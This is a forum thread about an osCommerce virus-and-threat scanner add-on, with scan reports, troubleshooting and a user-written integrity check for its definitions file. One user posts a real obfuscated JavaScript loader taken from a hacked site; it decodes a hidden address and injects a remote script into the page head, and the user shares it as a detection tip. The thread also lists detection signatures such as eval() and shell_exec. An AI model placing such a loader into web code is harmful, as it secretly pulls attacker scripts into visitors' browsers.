90 replies to this topic

[sijo]

jfkafka, on 27 November 2010, 14:40, said:

Thanks for your swift response.

Could you explain why error_reporting(0
is considered a threat?

Also once you check a file, is there a way to mark
that particular line as safe for future scans?

jk

Q1: It's a 'nota bene ' because some unfriendly scripts could turn off error reporting for some reason..
Q2: It could be done, but I dont have the time to look into it now...

[Annisse]

Hi Sijo!

Just installed your latest version of VTS and got this... should any of these be a concern to me? I just cleaned up a bunch of suspected infected files which I compared to an original copy of my catalog store which were not there before.

Thanks for your help!
~Annissë


Scan Completed

osCommerce Virus & Threat Scan v1.0.8

Scan root: <path>/public_html

Threats Definitions: 281

Files Definitions: 22

Scanned folders: 175

Scanned files: 1205

Possible Infected files: 15

Possible Threat files: 0

Whitespace found: 0

Possible Infection: <path>/public_html/flashmo_118_fashion_gallery_v8.html (Known automated hack <=> eval( ) on line: 22

Possible Infection: <path>/public_html/corel.html (Known automated hack <=> eval( ) on line: 10

Possible Infection: <path>/public_html/AC_ActiveX.js (Known automated hack <=> eval( ) on line: 84

Possible Infection: <path>/public_html/buttontest/AC_RunActiveContent.js (Known automated hack <=> eval( ) on line: 303

Possible Infection: <path>/public_html/catalog/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482

Possible Infection: <path>/public_html/catalog/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84

Possible Infection:<path>/public_html/catalog/includes/languages/english/cookie_usage.php (Known automated hack <=> eval( ) on line: 1

Possible Infection: <path>/public_html/catalog/admin/easypopulate.php (Known automated hack <=> eval( ) on line: 1439

Possible Infection: <path>/public_html/catalog/admin/modules.php (Known automated hack <=> eval( ) on line: 213

Possible Infection: <path>/public_html/catalog/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 56

Possible Infection: <path>/public_html/catalog/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 34

Possible Infection: <path>/public_html/catalog/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405

Possible Infection: <path>/public_html/catalog/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61

Possible Infection: <path>/public_html/catalog/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57

Possible Infection: <path>/public_html/catalog/admin/configuration.php (Known automated hack <=> eval( ) on line: 125

==>> You should rename your admin folder ! How to rename admin

Edited by Mark Evans, 30 November 2010, 13:37.

[sijo]

Annisse, on 28 November 2010, 10:24, said:

Hi Sijo!

Just installed your latest version of VTS and got this... should any of these be a concern to me? I just cleaned up a bunch of suspected infected files which I compared to an original copy of my catalog store which were not there before.

First: You should not list your serverpath in public like you did here.

Since I dont now the addons you are using, you have to compare reported files with your original one to see if there is any diffs or maybe files that should not be there.

Files reported in ocVTS' folder AV are ok..

And you should rename your admin dir.

[Annisse]

sijo, on 29 November 2010, 09:23, said:

First: You should not list your serverpath in public like you did here.

Since I dont now the addons you are using, you have to compare reported files with your original one to see if there is any diffs or maybe files that should not be there.

Files reported in ocVTS' folder AV are ok..

And you should rename your admin dir.

Great. I knew that I probably should have not done this, I am trying to find a way to delete my post but can't seem to find any information.

Thanks for your help regarding my question.

[Annisse]

Thanks for editing my post Mark

[jfkafka]

Hi Sijo,

Hope all is excellent with you.

The mod works great (Thanks very much!) on hosted sites. However using a local machine with xxamp, php 5.3, VTS 1.0.8,
and windows xp,
getting this when running ocVTS:

Fatal error: Virus.def vulnerable to overwrite, please change permissions in C:\server\xampp\htdocs\public_html\renamed ADMIN FOLDER\AV\ocVTS.php on line 78

code from line 78:
// load virus defs from flat file
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);
$defs = load_defs('virus.def', $CONFIG['debug']);
$filedefs = load_filedefs('files.def', $CONFIG['debug']);
----- end of code -------

tried setting the file to read only, no joy
tried using virus.def from hosted site with file permissions 644
but when uploaded to local site
the permissions show up as xxx with all the boxes filled in,

Do you have any suggestions on how to solve this and help turn a crying.gif into a smiley face?
Thanks,
jk

Edited by jfkafka, 05 December 2010, 22:08.

[sijo]

jfkafka, on 05 December 2010, 21:55, said:

Hi Sijo,

Hope all is excellent with you.

The mod works great (Thanks very much!) on hosted sites. However using a local machine with xxamp, php 5.3, VTS 1.0.8,
and windows xp,
getting this when running ocVTS:

Fatal error: Virus.def vulnerable to overwrite, please change permissions in C:\server\xampp\htdocs\public_html\renamed ADMIN FOLDER\AV\ocVTS.php on line 78

I have never tested it on a local machine and I dont have the possibility to do it either. I dont think I can help you with this, sorry...
You could try to comment out these two lines like this:

//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

[jfkafka]

sijo, on 06 December 2010, 10:18, said:

I have never tested it on a local machine and I dont have the possibility to do it either. I dont think I can help you with this, sorry...
You could try to comment out these two lines like this:

//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

Thanks for your swift response.
Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

[jfkafka]

jfkafka, on 06 December 2010, 14:31, said:

Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

After following your suggestion to comment:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

I googled around and came up with a Plan B way to check the virus.def file,
in case anyone might find it useful or have any input on improving it

in admin/AV/ocvts.php

FIND
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

REPLACE WITH
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

// added new function to check the 'virus.def' File's Date Last Modified
filemtime_r('virus.def');

then add the new 'filemtime_r' function

FIND
# Updated to v.1.0.2 by sijo 220310
# Updated to v.1.0.3 by sijo 310310
# Updated to v.1.0.4 by sijo 230410
# Updated to v.1.0.5 by sijo 040510
# Updated to v.1.0.6 by sijo 190510
# Updated to v.1.0.7 by sijo 140910
# Updated to v.1.0.8 by sijo 260910

*/

ADD BELOW THAT

// 12-5-10 modified combination of code courtesy of:
// 1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
// 2. http://www.w3schools.com/PHP/func_filesystem_filemtime.asp
// 3. http://w3schools.com/PHP/func_filesystem_clearstatcache.asp

// Only take into account those files whose extensions you want to show.
// (In this case the only allowed extension is def)

$allowedExtensions = array(
// 'zip',
// 'rar',
// 'pdf',
// 'txt',
'def'
);

function filemtime_r($path) {
global $allowedExtensions;
// testing echo ' in av/ocvts.php function filemtime_r and path = ' . $path;

if (!file_exists($path)) {
// testing echo ' in av/ocvts.php function filemtime_r and file doesn"t exist = ' . $path . '<br />';
exit('File: - ' . $path . ' - NOT FOUND in admin/AV Folder (need to add it)');
return 0;
}
$extension = end(explode(".", $path));
// testing echo ' in av/ocvts.php function filemtime_r and extension = ' . $extension . '<br />';


if (is_file($path) && in_array($extension, $allowedExtensions)) {

// testing echo ' in av/ocvts.php function filemtime_r and is file(path) and in array(extension, allowedExtensions) ' . $extension . '<br />';

$last_authorized_modified = 1291651410;
$last_file_modified = filemtime($path);

if ($last_file_modified != $last_authorized_modified) {
echo '<h1> File Authenticity Error! </h1>';
echo '<br />';
// testing echo "Last Authorized modified: ". date("F d Y H:i:s.",filemtime($last_authorized_modified));
// testing echo '<br />';
// testing echo "Last modified: ". date("F d Y H:i:s.",filemtime($path));
// testing echo '<br />';
echo 'Exiting until File - virus.def - Authenticity has been Verified (' . $last_file_modified . ')<br />'
. 'If this IS an Authorized new file,' . '<br />'
. ' (in admin/AV/ocVTS.php)'. '<br />'
. 'change this line TO - $last_authorized_modified = ' . $last_file_modified
. '<br />' . 'Otherwise REPLACE current - virus.def - with the <b>LAST Authorized</b> - virus.def - File.' .
'<br />' . 'This error indicates possible Site Security breach.';

exit();

} else { // AUTHENTICITY VERIFIED - ($last_file_modified = $last_authorized_modified)
// OK TO CONTINUE WITH SCAN

// testing echo filemtime($path);
// testing echo '<br />';
// testing echo 'File Authenticity Verified:';
// testing echo '<br />';
// testing echo 'Last modified: ' . date('F d Y H:i:s.',filemtime($path));

} // X if ($last_file_modified != $last_authorized_modified) {

// Note (from w3schools.com): The result of this function are cached. Use clearstatcache() to clear the cache.
clearstatcache();

} // X if (is_file($path) && in_array($extension, $allowedExtensions)) {

} // X function filemtime_r($path) {
// X 12-5-10 modified combination of code courtesy of: ...

---------- end of code -----------

I left the name of the function - filemtime_r($path), so anyone can check it from the first reference
1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
(of course I modified it for this purpose)

Sijo, hope you don't mind my posting this - just wanted to share (as per your inspiring example!)

jk

[jfkafka]

sorry, couldn't edit and add these things I thought of right after I hit the submit

so here it is with some extra info

jfkafka, on 06 December 2010, 14:31, said:

Howbout this, check the date of the 'virus.def' file and if it is different then it has been altered?

jk

After following your suggestion to comment:
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

I googled around and came up with a Plan B way to check the virus.def file,
in case anyone might find it useful or have any input on improving it

This works on my localhost machine using xxamp, php5.3 and VTS1_0_8
I haven't tried it on the hosted site yet

oh yeah USE AT YOUR OWN RISK

in admin/AV/ocvts.php

FIRST - BACKUP ocvts.php - FIRST!
I just rename the file ocvts12510.php (add the date so I know when it was changed)
and save it

FIND
if (!check_defs('virus.def'))
trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

REPLACE WITH
//if (!check_defs('virus.def'))
//trigger_error("Virus.def vulnerable to overwrite, please change permissions", E_USER_ERROR);

// added new function to check the 'virus.def' File's Date Last Modified
filemtime_r('virus.def');

then add the new 'filemtime_r' function

FIND
# Updated to v.1.0.2 by sijo 220310
# Updated to v.1.0.3 by sijo 310310
# Updated to v.1.0.4 by sijo 230410
# Updated to v.1.0.5 by sijo 040510
# Updated to v.1.0.6 by sijo 190510
# Updated to v.1.0.7 by sijo 140910
# Updated to v.1.0.8 by sijo 260910

*/

ADD BELOW THAT

// 12-5-10 modified combination of code courtesy of:
// 1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
// 2. http://www.w3schools.com/PHP/func_filesystem_filemtime.asp
// 3. http://w3schools.com/PHP/func_filesystem_clearstatcache.asp

// Only take into account those files whose extensions you want to show.
// (In this case the only allowed extension is def)

$allowedExtensions = array(
// 'zip',
// 'rar',
// 'pdf',
// 'txt',
'def'
);

function filemtime_r($path) {
global $allowedExtensions;
// testing echo ' in av/ocvts.php function filemtime_r and path = ' . $path;

if (!file_exists($path)) {
// testing echo ' in av/ocvts.php function filemtime_r and file doesn"t exist = ' . $path . '<br />';
exit('File: - ' . $path . ' - NOT FOUND in admin/AV Folder (need to add it)');
return 0;
}
$extension = end(explode(".", $path));
// testing echo ' in av/ocvts.php function filemtime_r and extension = ' . $extension . '<br />';


if (is_file($path) && in_array($extension, $allowedExtensions)) {

// testing echo ' in av/ocvts.php function filemtime_r and is file(path) and in array(extension, allowedExtensions) ' . $extension . '<br />';

$last_authorized_modified = 1291651410;
$last_file_modified = filemtime($path);

if ($last_file_modified != $last_authorized_modified) {
echo '<h1> File Authenticity Error! </h1>';
echo '<br />';
// testing echo "Last Authorized modified: ". date("F d Y H:i:s.",filemtime($last_authorized_modified));
// testing echo '<br />';
// testing echo "Last modified: ". date("F d Y H:i:s.",filemtime($path));
// testing echo '<br />';
echo 'Exiting until File - virus.def - Authenticity has been Verified (' . $last_file_modified . ')<br />'
. 'If this IS an Authorized new file,' . '<br />'
. ' (in admin/AV/ocVTS.php)'. '<br />'
. 'change this line TO - $last_authorized_modified = ' . $last_file_modified
. '<br />' . 'Otherwise REPLACE current - virus.def - with the <b>LAST Authorized</b> - virus.def - File.' .
'<br />' . 'This error indicates possible Site Security breach.';

exit();

} else { // AUTHENTICITY VERIFIED - ($last_file_modified = $last_authorized_modified)
// OK TO CONTINUE WITH SCAN

// testing echo filemtime($path);
// testing echo '<br />';
// testing echo 'File Authenticity Verified:';
// testing echo '<br />';
// testing echo 'Last modified: ' . date('F d Y H:i:s.',filemtime($path));

} // X if ($last_file_modified != $last_authorized_modified) {

// Note (from w3schools.com): The result of this function are cached. Use clearstatcache() to clear the cache.
clearstatcache();

} // X if (is_file($path) && in_array($extension, $allowedExtensions)) {

} // X function filemtime_r($path) {
// X 12-5-10 modified combination of code courtesy of: ...

---------- end of code -----------

NOW TO TEST IT:
1. go to admin/tools and click VTS Virus & Threat Scanner
2. Click ocVTS Scan your site using 'virus.def' and 'files.def' files
3. You should get an error Page with the message:

File Authenticity Error!
Exiting until File - virus.def - Authenticity has been Verified (1291651410)
If this IS an Authorized new file,
(in admin/AV/ocVTS.php)
change this line TO - $last_authorized_modified = 1291651410
Otherwise REPLACE current - virus.def - with the LAST Authorized - virus.def - File.
This error indicates possible Site Security breach.

4. Don't Panic- this is to show it's working
5. The message tells you what to do
6. for instance

If this IS an Authorized new file,
(in admin/AV/ocVTS.php)
change this line TO - $last_authorized_modified = 1291651410
NOTE: this number may be different for your version of virus.def,
I'm using the virus.def from VTS 1_0_8

Whatever that number is
change the line
in admin/AV/ocVTS.php to match it
just copy and paste that number from
$last_authorized_modified = WHATEVER NUMBER
over the existing number in the line
$last_authorized_modified = 1291651410

now run the scan again and it should pass the test
(now it matches the result of the filemtime($path) php function for the virus.def File
hope this all makes sense and doesn't cause drowsiness

and whenever this virus.def File is updated/replaced
go thru these steps again

I left the name of the function - filemtime_r($path), so anyone can check it from the first reference
1. avi at live dot com 02-Feb-2009 11:22 (http://php.net/manual/en/function.filemtime.php)
(of course I modified it for this purpose)

Sijo, hope you don't mind my posting this - just wanted to share (as per your inspiring example!)

jk

[sijo]

I am sorry to tell that osCommerce VTS will no longer be suported. I have closed my netshop and will be doing other things in the future.

I wish you all a Happy New Year!

[geoffreywalton]

I have added this thread to my watch list and will try to support this contribution as well as Stein has done.

Thanks for developing this in the first place and all your input over time.

Cheers

G

[Mort-lemur]

Hi,

Installed the latest version and it works great.

One request from me - the results show in very small text, how can the size of the results text be increased? Maybe I just need Glasses ...

Thanks

[Mort-lemur]

Hi,

Please ignore my last post - found where to modify text size.

Thanks

[redfoxmedia]

sdsd

Edited by redfoxmedia, 05 March 2011, 03:27.

[m2calabr]

Anther search string should be for fromCharCode (in all javascript) I had a site hacked some of inserted code was obfuscated very well. The imbeded javascript code looked like

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
	var s = "";
	for (j=0;j<t.length;j++) {
		var c_rgb = t[j];
		for (i=1;i<7;i++) {
			var c_clr = c_rgb.substr(i++,2);
			if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
		}
	}
	if (styled) {
		s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
	} else {
		s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
	}
	return s;
   }

   function try_pick_colors() {
	try {
	   	if(!document.getElementById || !document.createElement){
			document.write(div_pick_colors(div_colors,1));
		   } else {
			var new_cstyle=document.createElement("script");
			new_cstyle.type="text/javascript";
			new_cstyle.src=div_pick_colors(div_colors,0);
			document.getElementsByTagName("head")[0].appendChild(new_cstyle);
		}
	} catch(e) { }
	try {
		check_colors_picked();
	} catch(e) {
		setTimeout("try_pick_colors()", 500);
	}
   }

Just a heads up.

[jaggster]

I installed latest VTS and ran it. It found "possibly" infected files and potential threats, mostly of the form:

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[fake catalog]/includes/functions/general.php (Known automated hack <=> eval( ) on line: 506
or
Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/[my admin]/jquery/fancybox/jquery.fancybox-1.3.4.pack.js (Known automated hack <=> iframe) on line: 20

Are there any valid uses of eval() and iframe ? How do I know if it is or isn't infected?

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/cookie_usage.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/image.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/includes/languages/english/cookie_usage.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/mail.php (Known filename threat)
File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/includes/languages/english/mail.php (Known filename threat)


and 1 shell exec warning in a non osc file:

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/contact/libs/php-captcha.inc.php (Known automated hack <=> shell_exec ) on line: 466

What should I be doing about this? Thank you for any assistance you can offer.

[geoffreywalton]

These messages indicate that it is possible that there is malicious code in the files mentioned.

You need to go and look at the code in those files and see what it does and make an informed opinion.

It is not possible to tell if there is a problem without seeing the code.

HTH

G

[tmckee]

I am using:

• osCommerce 2.3.1
  
• PHP 5.2
  
• Apache
  
• osCommerce Virus & Threat Scanner v1.0.12 (although the title of it when I downloaded it was osCommerce Virus & Threat Scanner v1.0.13

I installed as per the instructions (very straight forward). I go the the admin page and click on 'Virus & Threat Scan) and then on 'ocVTS'. In both FF and IE, the page churns away and then I get '500 Internal Server Error'. What could be causing this?

[jperezbadia]

please someonehelp me withthis error:
Fatalerror:Maximumexecutiontimeof 30secondsexceededin /home2/jpreloje/public_html/adminlahia/AV/ocVTS.phpon line353